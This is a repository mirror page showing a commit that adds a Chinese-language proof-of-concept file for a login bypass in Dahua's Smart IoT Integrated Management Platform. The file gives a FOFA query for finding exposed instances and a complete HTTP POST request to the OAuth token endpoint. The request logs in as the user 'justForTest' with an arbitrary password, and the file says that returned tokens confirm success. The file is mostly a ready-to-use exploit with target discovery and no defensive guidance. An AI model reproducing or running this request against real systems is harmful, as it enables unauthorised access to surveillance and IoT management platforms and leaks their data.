crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 20:24:57 +08:00
Code Issues Packages Projects Releases Wiki Activity

Create 大华智能物联综合管理平台justForTest用户登录漏洞.md

Browse Source
This commit is contained in:
wy876 2023-12-17 12:04:35 +08:00 committed by GitHub
parent d32f7fa15a
commit a0ec910445
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 23 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
大华智能物联综合管理平台justForTest用户登录漏洞.md Normal file
View File

@ -0,0 +1,23 @@
## 大华智能物联综合管理平台justForTest用户登录漏洞
浙江大华技术股份有限公司智能物联综合管理平台 用户登录接口/evo-apigw/evo-oauth/oauth/token存在漏洞使用用户justForTest/任意密码即可成功登录平台,造成信息泄露。
## fofa
```
icon_hash="-1935899595"body="*客户端会小于800*"
```
## poc
```
POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Content-Length: 109
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
```
出现各种token证明漏洞存在
![image](https://github.com/wy876/POC/assets/139549762/5f1c189e-2d92-4d73-a6c2-8593367c74bb)